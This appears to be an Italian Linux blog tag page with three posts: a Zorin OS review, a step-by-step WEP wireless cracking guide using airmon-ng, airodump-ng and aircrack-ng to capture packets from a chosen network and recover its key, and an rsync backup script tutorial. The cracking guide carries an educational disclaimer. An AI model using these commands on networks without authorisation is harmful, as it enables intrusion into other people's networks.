Etichettato: linux

ZorinOS, Ubuntu ha messo le ali

logo

In circolazione dal 2014 questa affidabile e leggera distro Ubuntu based si caratterizza per velocità e leggerezza, qualità che la rendono perfetta per tutti i PC, anche i più datati.

Zorin OS è adatta ai principianti come agli utenti più smaliziati, la dotazione software è coerente con le varie versioni disponibili e generalmente più che soddisfacente.

Per ottenere il massimo in termini di prestazioni è consigliabile disattivare gli effetti grafici, comunque mai troppo pesanti nella configurazione di default (installazione di Zorin OS 10 64 Bit su Cpu Core 2 Duo @ 2,4 Ghz, 4 Gb RAM DDR3, 256 Mb nVidia Graphic Card).

Alle due alternative free (Lite e Core) disponibili nelle versioni 9 e 10 -basate rispettivamente su Ubuntu 15.04 (Vivid Vervet) e Ubuntu 15.10 (Wily Werewolf)– si aggiungono Educational (32 Bit e 64 Bit) e Educational Lite (solo a 32 Bit) disponibili però solo nella versione 9.

Completano l’offerta due versioni a pagamento studiate per il business, Zorin OS 9 Business (32 Bit e 64 Bit) a €8,99 e  Zorin OS 9 Ultimate (32 Bit e 64 Bit) a €9,99.

In definitiva la distro ideale per gli amanti di Ubuntu e della velocità!

Per approfondimenti, dettagli tecnici, specifiche e altro, ecco una selezione di link che riguardano GNU/Linux Zorin OS:

# Pagina Ufficiale

# Zorin OS su Distro Watch

# Zorin OS sul Wiki di Ubuntu

Guida rapida al wireless cracking (WEP)

***
Note: La presente guida è pubblicata esclusivamente a scopo didattico. Collegarsi a reti wireless senza l’autorizzazione del proprietario costituisce reato punibile penalmente. Il WEP è stato dichiarato non sicuro da anni, la sua diffusione attuale è molto limitata. Se la vostra rete wireless è cifrata utilizzando il WEP dovreste immediatamente proteggervi utilizzando la cifratura WPA o WPA2. Gli output del terminale sono stati in alcuni casi semplificati rimuovendo informazioni non rilevanti allo scopo di migliorare leggibilita’ e comprensione della guida.
***

Guida rapida al wireless cracking (WEP) – Prima parte

Per craccare una rete wireless con cifratura WEP sono sufficienti un pc dotato di scheda di rete Wi-Fi e un programma di nome aircrack-ng (ng sta per New Generation, essendo questa una versione aggiornata e piu’ evoluta di aircrack).

1) Installare aircrack-ng:

sudo apt-get install aircrack-ng

2) Avviare la modalita’ di monitoraggio (monitor mode):
Prima occorre disabilitare la scheda wireless:

sudo airmon-ng stop wlan0

Poi va riavviata in monitor mode:

sudo airmon-ng start wlan0

Nell’esempio il nome della scheda di rete è wlan0. Su un pc dotato di una scheda ethernet piu’ una wireless solitamente il nome è wlan0. Per trovare il nome della scheda di rete digitare da terminale il seguente comando:

ifconfig -a

Ecco l’output:

$ ifconfig -a
eth0      Link encap:Ethernet  HWaddr 00:00:00:00:00:00
UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
RX packets:22937 errors:0 dropped:0 overruns:0 frame:0
TX packets:19393 errors:0 dropped:0 overruns:0 carrier:1
collisions:0 txqueuelen:1000
RX bytes:22963442 (22.9 MB)  TX bytes:2411958 (2.4 MB)

wlan0     Link encap:Ethernet  HWaddr 00:00:00:00:00:00
UP BROADCAST MULTICAST  MTU:1500  Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

3) Visualizziamo le reti wireless intorno a noi con il comando:

sudo airodump-ng wlan0

Come si vede ci sono due reti, una con cifratura WPA mentre l’altra usa il WEP. I dati interessanti ai fini di questa guida sono:

* il campo BSSID, che mostra gli indirizzi MAC dei router/ap

* CH che è il canale di trasmissione

* ESSID che è il nome della rete wireless

Individuata la rete da attaccare, possiamo metterci all’opera iniziando a sniffare i pacchetti con:

sudo airodump-ng -c x –bssid xx:xx:xx:xx:xx:xx -w dump wlan0

Inserire al posto delle x i valori corretti di canale (CH) e BSSID.
Una volta sniffato un numero sufficiente di pacchetti, lanciare aircrack-ng sul file .cap generato nella home utente da airodump-ng:

sudo aircrack-ng -b xx:xx:xx:xx:xx:xx dump-01.cap

Ed ecco la chiave in formato HEX.

Semplice script per backup sincroni con rsync

Per prima cosa creiamo la directory che ospiterà il backup:

(un backup ha senso se fatto su un disco differente, se lo facciamo su una partizione dello stesso disco che ospita i file originali in caso di rottura dello stesso perdiamo anche il backup)

mkdir /percorso/directory

Adesso creiamo lo script:

gedit nome_dello_script.sh

Nel file vuoto inseriamo il testo seguente:

#!/bin/sh

echo "ESECUZIONE BACKUP NOME_CARTELLA"

ls /percorso/della/cartella

rsync -vurt --progress --delete /percorso/della/cartella/ /percorso/del/backup/

echo "BACKUP NOME_CARTELLA COMPLETATO!"

Salviamo il file (io ho una directory 'script' nella mia home utente) e rendiamolo eseguibile:

chmod 755 nome_dello_script.sh

Infine lanciamolo con:

./nome_dello_script.sh

E' possibile inserire più di un percorso nello script, per sincronizzare più directory.

Per eseguire backup a intervalli regolari possiamo inserire lo script in cron.

Nota: per un corretto funzionamento si consiglia di NON usare partizioni FAT o NTSF

ATTENZIONE: il backup è sincrono: i file eliminati dalla directory
originale verranno rimossi anche nella destinazione!
eliminare l'opzione --delete dallo script per eseguire un backup
asincrono

per approfondimenti su rsync: digitare man rsync nel terminale